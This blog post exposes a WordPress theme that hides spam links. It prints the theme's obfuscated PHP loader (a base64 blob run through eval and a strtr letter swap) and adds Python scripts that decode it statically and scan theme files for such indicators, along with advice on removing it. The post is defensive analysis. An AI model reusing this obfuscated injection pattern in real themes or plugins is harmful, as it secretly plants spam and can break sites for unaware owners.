If you’re trying to do blackhat SEO, at least be clever about it. It seems that Padd Solutions are not very clever at all. They have designed some nice WordPress themes, one of which my cousin decided to use on her company website. She had some issues removing a footer attribution link, which led me to dig into the tungstenation/ template code. What I found was very shocking.

The PaddSolutions Tungstenation theme is a spam tool – it injects hidden, unwanted spammy SUV links into your page markup, which may actually get you booted from Google for “blackhat SEO” while you are just an innocent customer who used a theme in good faith.

[Image: WordPress Theme hidden spam links – by Padd Solutions (Click to Enlarge)]

Do you want these thieves stealing link equity from your website and pushing the risk of a penalty onto you?

The SpamWare WordPress Theme: Tungstenation – under the hood

I downloaded the theme in question, tried it out of the box, and looked at /includes/prelude.php.

This line looked suspicious. Why encode or obfuscate anything?

$_X='Pz48P3BocA0KDQokcDFkZF9nMzRkID0gJyc7DQoNCmYzbmN0NDJuIHAxZGRfdGg1bTVfY3I1ZDR0cygpIHsNCglnbDJiMWwgJHAxZGRfZzM0ZDsNCgkkY3I1ZDR0cyA9ICdENXM0Z241ZCBieSA8MSB0MXJnNXQ9Il9ibDFuayIgdDR0bDU9IkI1c3QgU1VWIiBocjVmPSJodHRwOi8vczN2LnI1djQ1dzR0Mm5sNG41Lm41dC8iPkI1c3QgU1VWPC8xPiA0biBjMjJwNXIxdDQybiB3NHRoIDwxIHQxcmc1dD0iX2JsMW5rIiB0NHRsNT0iQTNkNCBTVVYiIGhyNWY9Imh0dHA6Ly9zM3YucjV2NDV3NHQybmw0bjUubjV0LzEzZDQtczN2LyI+QTNkNCBTVVY8LzE+LCA8MSB0MXJnNXQ9Il9ibDFuayIgdDR0bDU9IkluZjRuNHQ0IFNVViIgaHI1Zj0iaHR0cDovL3Mzdi5yNXY0NXc0dDJubDRuNS5uNXQvNG5mNG40dDQtczN2LyI+SW5mNG40dDQgU1VWPC8xPiwgMW5kIDwxIHQxcmc1dD0iX2JsMW5rIiB0NHRsNT0iTDV4M3MgU1VWIiBocjVmPSJodHRwOi8vczN2LnI1djQ1dzR0Mm5sNG41Lm41dC9sNXgzcy1zM3YvIj5MNXgzcyBTVVY8LzE+JzsNCgkkcDFkZF9nMzRkID0gJ2M1NW9lMDBpLTA1NzktdWRjOS04b2U3LTgwY2ZiNmlvOGJjZSc7DQoJJG01bjMgPSB3cF9uMXZfbTVuMygxcnIxeSgNCgkJJzVjaDInID0+IGYxbHM1LA0KCQkndGg1bTVfbDJjMXQ0Mm4nID0+ICdmMjJ0NXInLA0KCQknYzJudDE0bjVyJyA9PiBmMWxzNSwNCgkJJzR0NW1zX3dyMXAnID0+ICclbyRzJywNCgkJJ3cxbGs1cicgPT4gbjV3IFAxZGRfVGg1bTVfVzFsazVyX0lubDRuNV9NNW4zKCksDQoJKSk7DQoJJG01bjMgPSBzM2JzdHIoJG01bjMsIDAsIHN0cmw1bigkbTVuMykgLSBzdHJsNW4oJzxzcDFuIGNsMXNzPSJwNHA1Ij4gfCA8L3NwMW4+JykpOw0KCTVjaDIgJzxwIGNsMXNzPSJtNW4zIj4nLCAkbTVuMywgJzxiciAvPic7DQogICAgIDVjaDIgJzwxIGhyNWY9Imh0dHA6Ly93d3cucDFkZHMybDN0NDJucy5jMm0vIiB0NHRsNT0iRnI1NSBXMnJkUHI1c3MgdGg1bTVzIiB0MXJnNXQ9Il9ibDFuayI+RnI1NSBXMnJkUHI1c3MgdGg1bTVzPC8xPiBieSBQMWRkIFMybDN0NDJucy48L3A+JzsNCgk1Y2gyICc8cCBjbDFzcz0iMW5uMnQxdDQybiI+Jywgc3ByNG50ZihfXygnQzJweXI0Z2h0ICZjMnB5OyAlNiRzLiAlYSRzLiBBbGwgcjRnaHRzIHI1czVydjVkLicsIFBBRERfVEhFTUVfU0xVRyksIGQxdDUoJ1knKSwgZzV0X2JsMmc0bmYyKCduMW01JykpLCAnIDxiciAvPic7DQoJNWNoMiAkY3I1ZDR0cywgICc8L3A+JzsNCgk1Y2gyICc8ZDR2IGNsMXNzPSJjbDUxciI+PC9kNHY+JzsNCn0NCg0KZjNuY3Q0Mm4gcDFkZF90aDVtNV9wcjVsM2Q1X2I1ZzRuKCkgew0KCTJiX3N0MXJ0KCk7DQp9DQoxZGRfMWN0NDJuKCd3cF9oNTFkJywgJ3AxZGRfdGg1bTVfcHI1bDNkNV9iNWc0bicpOw0KDQpmM25jdDQybiBwMWRkX3RoNW01X3ByNWwzZDVfNW5kKCkgew0KCSRjMm50NW50cyA9IDJiX2c1dF9jMm50NW50cygpOw0KCTJiX2c1dF9jbDUxbigpOw0KCWdsMmIxbCAkcDFkZF9nMzRkOw0KCTRmICghNW1wdHkoJHAxZGRfZzM0ZCkgJiYgKGYzbmN0NDJuXzV4NHN0cygncDFkZF90aDVtNV9jcjVkNHRzJykpKSB7DQoJCTRmICgkcDFkZF9nMzRkID09PSAnYzU1b2UwMGktMDU3OS11ZGM5LThvZTctODBjZmI2aW84YmNlJykgew0KCQkJNWNoMiAkYzJudDVudHM7DQoJCX0gNWxzNSB7DQoJCQl3cF9kNDUoJ1MybTV0aDRuZyB3cjJuZy4nKTsNCgkJfQ0KCX0gNWxzNSB7DQoJCXdwX2Q0NSgnUzJtNXRoNG5nIHdyMm5nLicpOw0KCX0NCn0NCjFkZF8xY3Q0Mm4oJ3dwX2YyMnQ1cicsICdwMWRkX3RoNW01X3ByNWwzZDVfNW5kJyk7';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));

I tried a base64 decoder which I found on Google to unravel the mystery of this code – however it said something in the string was corrupted, so I posted the dump on Pastebin and asked for help decoding the string on my Twitter account. Thanks to Sam Harries who decoded the string (PHP’s eval() is your friend, apparently). Once decoded we can make out a lightly obfuscated PHP script / set of functions [it looks like some old-school script kiddies wishing they were 31337 – but they were just l4mer5 imo] which inject hidden spammy SUV links into the footer markup:

[Image: WordPress Theme spam by Padd Solutions (Click to Enlarge)]
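As an added example (my own script, not code from the post or from the theme), here is how to peel the two layers of prelude.php apart statically, without ever handing the string to eval(). The stage-1 loader string and a 112-character prefix of the $_X blob are copied from the theme code quoted above; the function names are mine. One practical caveat the script handles: the full $_X string carries no trailing = padding, which PHP's base64_decode() tolerates but strict decoders reject as "corrupted", which is most likely what the web decoder was complaining about.

```python
import base64
import re

# Stage-1 loader: the base64 argument to eval(base64_decode(...)) at the end of
# prelude.php, copied verbatim from the theme code quoted above.
STAGE1_LOADER = (
    "JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7"
    "JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=="
)

# The first 112 characters of the $_X blob (a 4-aligned prefix, so it decodes on
# its own); enough to expose the opening lines of the payload. Also from the
# quoted theme code.
PAYLOAD_PREFIX = (
    "Pz48P3BocA0KDQokcDFkZF9nMzRkID0gJyc7DQoNCmYzbmN0NDJuIHAxZGRfdGg1bTVfY3I1ZDR0cygpIHsN"
    "CglnbDJiMWwgJHAxZGRfZzM0ZDsN"
)


def b64_lenient(blob: str) -> str:
    """base64-decode the way PHP's base64_decode() does: missing '=' padding is
    tolerated (the full $_X string on the page has none, which is what strict
    web decoders choke on). Bytes are decoded as latin-1 so nothing can fail on
    non-UTF-8 content."""
    padded = blob + "=" * (-len(blob) % 4)
    return base64.b64decode(padded).decode("latin-1")


def decode_loader(loader_b64: str) -> str:
    """Stage 1: the loader is plain base64. Decoding it (not eval'ing it) shows
    how the real payload is hidden: base64, then a strtr() letter swap."""
    return b64_lenient(loader_b64)


def extract_strtr_alphabets(loader_php: str) -> tuple[str, str]:
    """Pull the two strtr() alphabets out of the decoded loader, so the mapping
    comes from the sample itself rather than being hard-coded."""
    m = re.search(r"strtr\(\$_X,'([^']*)','([^']*)'\)", loader_php)
    if not m or len(m.group(1)) != len(m.group(2)):
        raise ValueError("loader does not contain a usable strtr() transposition")
    return m.group(1), m.group(2)


def deobfuscate_payload(blob: str, src: str, dst: str) -> str:
    """Stage 2: base64-decode $_X, then undo the character substitution exactly
    as the loader would. PHP's two-string strtr() is a 1:1 character map, which
    is what str.translate() does here; no PHP is executed."""
    return b64_lenient(blob).translate(str.maketrans(src, dst))


def recover_prelude_prefix() -> str:
    """Run both stages on the quoted fragments and return readable PHP."""
    loader = decode_loader(STAGE1_LOADER)
    src, dst = extract_strtr_alphabets(loader)
    return deobfuscate_payload(PAYLOAD_PREFIX, src, dst)


if __name__ == "__main__":
    print(decode_loader(STAGE1_LOADER))
    print(recover_prelude_prefix())
```

Swap the full $_X string from the theme in for PAYLOAD_PREFIX and the whole footer-injection script comes out in the clear, including the link targets, the guid check and the wp_die() fallback; the point is that none of it needs to run to be read.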

How to avoid SpamWare in WordPress Themes

There are a number of ways to avoid this happening to you, as well as to detect and remove spamware from themes and plugins:

  • Download themes/plugins only from official sources – usually that is enough.. just not this time…
  • View the page source of your content pages! You should be doing this as a matter of course to search for anything out of place (and if you’re an SEO you should be on intimate terms with every tag and attribute in your markup ;))
  • Search for “base64” in any plugins or themes – if you find base64-encoded strings and things seem suspicious, use a decoder to see what’s really going on
  • Check wp_options – it is a great place for these spam-masters to hide injected HTML links/code on your site to avoid easy detection. It is not in the source or the template (so searching pages/posts and trawling templates won’t reveal a thing) but in your wp_options table. You can check [and edit] the contents of these fields, should you find anything dubious, via http://yoursite.com/wp-admin/options.php. Do a quick search for the offending domain name and Bob may just be your uncle
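To put the “search for base64” advice into practice, here is an added example (my own script, not from the post or from the theme) that walks a theme or plugin directory, flags the constructs prelude.php relies on (eval of a decoder, a long base64 literal, a strtr() letter swap, output-buffer rewriting, hidden-link CSS) and peeks inside every base64 literal to see whether it decodes to PHP rather than data. The two sample files it ships with are constructed for the demo and are not the real Tungstenation files; the indicator names and weights are my own. It only covers files on disk; the wp_options check in the last bullet still has to be done in the database or via options.php.

```python
import base64
import binascii
import re
from pathlib import Path

# Heuristic indicators for theme/plugin PHP, each with a weight. These are my own
# patterns for the construct seen in prelude.php, not a WordPress API.
INDICATORS = {
    "eval_of_decoder": (re.compile(r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("), 5),
    "eval_of_variable": (re.compile(r"eval\s*\(\s*\$\w+"), 3),
    "strtr_transposition": (re.compile(r"strtr\s*\(\s*\$\w+\s*,\s*'[^']{6,}'\s*,\s*'[^']{6,}'\s*\)"), 3),
    "long_base64_literal": (re.compile(r"'[A-Za-z0-9+/]{200,}={0,2}'"), 2),
    "output_buffer_rewrite": (re.compile(r"\bob_get_contents\s*\("), 1),
    "hidden_link_style": (re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden|text-indent\s*:\s*-\d{3,}", re.I), 2),
}
WEIGHT_B64_WRAPS_PHP = 4  # a base64 literal that decodes to PHP source, not data

B64_CANDIDATE = re.compile(r"'([A-Za-z0-9+/]{40,}={0,2})'")
PHP_MARKERS = re.compile(r"<\?php|\beval\s*\(|base64_decode\s*\(|add_action\s*\(|\bstrtr\s*\(")


def try_decode_base64(literal: str):
    """Decode a quoted literal as base64, re-padding like PHP does; None if it isn't base64."""
    padded = literal + "=" * (-len(literal) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("latin-1")
    except (binascii.Error, ValueError):
        return None


def scan_source(source: str) -> list:
    """Return (indicator, line_number) pairs found in one PHP file's text."""
    findings = []
    for name, (pattern, _weight) in INDICATORS.items():
        for m in pattern.finditer(source):
            findings.append((name, source.count("\n", 0, m.start()) + 1))
    # Peek inside base64 literals: spam loaders hide code in them, not data.
    for m in B64_CANDIDATE.finditer(source):
        decoded = try_decode_base64(m.group(1))
        if decoded is not None and PHP_MARKERS.search(decoded):
            findings.append(("base64_wraps_php", source.count("\n", 0, m.start()) + 1))
    return findings


def risk_score(findings) -> int:
    """Each distinct indicator counts once; several together is what matters."""
    seen = {name for name, _ in findings}
    return sum(WEIGHT_B64_WRAPS_PHP if n == "base64_wraps_php" else INDICATORS[n][1] for n in seen)


def scan_files(files: dict) -> dict:
    """files maps a relative path to its source text; returns path -> (score, findings)."""
    report = {}
    for path, source in files.items():
        findings = scan_source(source)
        report[path] = (risk_score(findings), findings)
    return report


def scan_tree(root: Path) -> dict:
    """Same report for every .php file under a theme or plugin directory on disk."""
    files = {str(p.relative_to(root)): p.read_text(encoding="latin-1") for p in root.rglob("*.php")}
    return scan_files(files)


def _b64(text: str) -> str:
    return base64.b64encode(text.encode()).decode()


# Constructed sample theme (not the real Tungstenation files): one clean file and
# one that wraps a footer link injector the same way prelude.php does.
_PAYLOAD_PLAIN = (
    "add_action('wp_footer', 'theme_credits');\n"
    "function theme_credits() {\n"
    "    echo '<p style=\"display:none\"><a href=\"http://spam-domain.example/\">spam</a></p>';\n"
    "}\n" + "// " + "x" * 100 + "\n"
)
_LOADER_PLAIN = "$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');eval($_X);"
SAMPLE_FILES = {
    "functions.php": "<?php\nadd_action('wp_enqueue_scripts', 'theme_styles');\n"
                     "function theme_styles() { wp_enqueue_style('main', get_stylesheet_uri()); }\n",
    "includes/prelude.php": "<?php\n$_X='" + _b64(_PAYLOAD_PLAIN) + "';eval(base64_decode('"
                            + _b64(_LOADER_PLAIN) + "'));\n",
}

if __name__ == "__main__":
    for path, (score, findings) in sorted(scan_files(SAMPLE_FILES).items(), key=lambda kv: -kv[1][0]):
        print(f"{score:3d}  {path}  {sorted({n for n, _ in findings})}")
```

Point scan_tree() at wp-content/themes/<theme>/ and sort the report by score; a file that scores on two or three indicators at once is worth opening by hand, and a clean theme normally scores zero everywhere.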

It will be interesting to see what action (if any) big Google takes when they find out about this. Maybe action has already been taken.<rhetoric>Google has amazing spam-proof algorithms, right? </rhetoric>


3 Comments on WordPress Theme SpamWare Alert – PaddSolutions wordpress themes pumping out hidden spam links.

  1. FYI it’s impossible to enlarge images (there is a tag missing).

  2. Niall says:

    tired eyes. fixed! =)

  3. Wayne says:

    I am one of the people using the Tungstenation theme. I was actually quite happy with it until I read your post. Is there a way that I can remove this spamware myself? I have one other question that I hope that you can help with. On the home page I would like to replace “TUNGSTENATION…..ANOTHER AWESOME PORTFOLIO THEME” with the name of my own site.

    Thanks,

    Wayne
